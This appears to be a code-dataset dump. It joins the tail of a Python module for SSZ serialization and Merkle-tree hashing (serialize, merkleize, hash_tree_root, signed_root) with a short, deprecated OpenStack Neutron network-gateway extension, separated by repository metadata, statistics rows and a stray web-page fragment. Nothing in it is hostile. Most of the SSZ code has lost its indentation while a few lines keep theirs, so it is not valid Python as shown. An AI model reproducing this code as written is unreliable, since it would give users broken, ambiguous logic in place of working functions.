serialized_bytes = b''.join([serialize(getattr(value, field), subtype) for field, subtype in typ.fields.items()])
if is_constant_sized(typ):
return serialized_bytes
else:
assert len(serialized_bytes) < 2**(8 * BYTES_PER_LENGTH_PREFIX)
serialized_length = len(serialized_bytes).to_bytes(BYTES_PER_LENGTH_PREFIX, 'little')
return serialized_length + serialized_bytes
else:
print(value, typ)
raise Exception("Type not recognized")
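# Hand-checkable examples of the encoding produced by serialize() (a sketch):
#   serialize(5, 'uint16')        -> b'\x05\x00'
#   serialize([1, 2], ['uint8'])  -> b'\x02\x00\x00\x00' + b'\x01\x02'
#                                    (4-byte little-endian length prefix, then
#                                     the packed elements)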
def chunkify(bytez):
    # Right-pad with zero bytes up to the next multiple of BYTES_PER_CHUNK.
    bytez += b'\x00' * (-len(bytez) % BYTES_PER_CHUNK)
return [bytez[i:i+32] for i in range(0, len(bytez), 32)]
def pack(values, subtype):
return chunkify(b''.join([serialize(value, subtype) for value in values]))
def is_power_of_two(x):
return x > 0 and x & (x-1) == 0
def merkleize(chunks):
tree = chunks[::]
while not is_power_of_two(len(tree)):
tree.append(ZERO_CHUNK)
tree = [ZERO_CHUNK] * len(tree) + tree
for i in range(len(tree)//2-1, 0, -1):
tree[i] = hash(tree[i*2] + tree[i*2+1])
return tree[1]
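# Sketch of the tree merkleize() builds for three chunks A, B, C:
#   leaves padded to a power of two -> [A, B, C, ZERO_CHUNK]
#   parents -> hash(A + B), hash(C + ZERO_CHUNK)
#   root    -> hash(hash(A + B) + hash(C + ZERO_CHUNK))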
def mix_in_length(root, length):
return hash(root + length.to_bytes(32, 'little'))
def infer_type(value):
if hasattr(value.__class__, 'fields'):
return value.__class__
elif isinstance(value, list):
return [infer_type(value[0])] if len(value) > 0 else ['uint64']
elif isinstance(value, (bytes, str)):
return 'bytes'
elif isinstance(value, int):
return 'uint64'
else:
raise Exception("Failed to infer type")
def hash_tree_root(value, typ=None):
if typ is None:
typ = infer_type(value)
if is_basic(typ):
return merkleize(pack([value], typ))
elif isinstance(typ, list) and len(typ) == 1 and is_basic(typ[0]):
return mix_in_length(merkleize(pack(value, typ[0])), len(value))
elif isinstance(typ, list) and len(typ) == 1 and not is_basic(typ[0]):
return mix_in_length(merkleize([hash_tree_root(element, typ[0]) for element in value]), len(value))
elif isinstance(typ, list) and len(typ) == 2 and is_basic(typ[0]):
return merkleize(pack(value, typ[0]))
elif typ == 'bytes':
return mix_in_length(merkleize(chunkify(coerce_to_bytes(value))), len(value))
elif isinstance(typ, str) and typ[:5] == 'bytes' and len(typ) > 5:
assert len(value) == int(typ[5:])
return merkleize(chunkify(coerce_to_bytes(value)))
elif isinstance(typ, list) and len(typ) == 2 and not is_basic(typ[0]):
        # Fixed-length vector of composite elements: merkleize the element roots.
        return merkleize([hash_tree_root(element, typ[0]) for element in value])
elif hasattr(typ, 'fields'):
return merkleize([hash_tree_root(getattr(value, field), subtype) for field, subtype in typ.fields.items()])
else:
raise Exception("Type not recognized")
def truncate(container, field_name):
field_keys = list(container.fields.keys())
index = field_keys.index(field_name)
truncated_fields = {
key: container.fields[key]
for key in field_keys[:index]
}
truncated_class = SSZType(truncated_fields)
kwargs = {
field: getattr(container, field)
for field in field_keys[:index]
}
return truncated_class(**kwargs)
def signed_root(container, field_name):
return hash_tree_root(truncate(container, field_name))
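# Self-check sketch (not part of the original module): exercises the public
# helpers on a made-up container with a trailing signature field.
if __name__ == '__main__':
    Example = SSZType({'slot': 'uint64', 'data': 'bytes32', 'signature': 'bytes96'})
    msg = Example(slot=1, data=b'\x22' * 32, signature=b'\x00' * 96)
    # signed_root() hashes the container with the signature field (and anything
    # after it) removed, so it differs from the full hash_tree_root().
    print('hash_tree_root:', hash_tree_root(msg).hex())
    print('signed_root   :', signed_root(msg, 'signature').hex())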
| 36.908046 | 132 | 0.625195 |
53299ea2815ea7f31b7a726384972e5c0bd0017a
| 1,376 |
py
|
Python
|
neutron/plugins/vmware/extensions/nvp_networkgw.py
|
yagosys/neutron
|
005fec677c3bf8b2aa0df68c4aedc2b708ec7caf
|
[
"Apache-2.0"
] | 1 |
2016-01-13T14:29:07.000Z
|
2016-01-13T14:29:07.000Z
|
neutron/plugins/vmware/extensions/nvp_networkgw.py
|
yagosys/neutron
|
005fec677c3bf8b2aa0df68c4aedc2b708ec7caf
|
[
"Apache-2.0"
] | null | null | null |
neutron/plugins/vmware/extensions/nvp_networkgw.py
|
yagosys/neutron
|
005fec677c3bf8b2aa0df68c4aedc2b708ec7caf
|
[
"Apache-2.0"
] | 3 |
2015-04-03T08:47:02.000Z
|
2020-02-05T10:40:45.000Z
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 VMware, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# TODO(armando-migliaccio): This is deprecated in Icehouse, and
# to be removed in Juno.
from neutron.plugins.vmware.extensions import networkgw
class Nvp_networkgw(networkgw.Networkgw):
"""(Deprecated) API extension for Layer-2 Gateway support."""
@classmethod
def get_name(cls):
return "Neutron-NVP Network Gateway"
@classmethod
def get_alias(cls):
return "network-gateway"
@classmethod
def get_description(cls):
return ("Connects Neutron networks with external "
"networks at layer 2 (deprecated).")
@classmethod
def get_namespace(cls):
return "http://docs.openstack.org/ext/neutron/network-gateway/api/v1.0"
| 32 | 79 | 0.706395 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.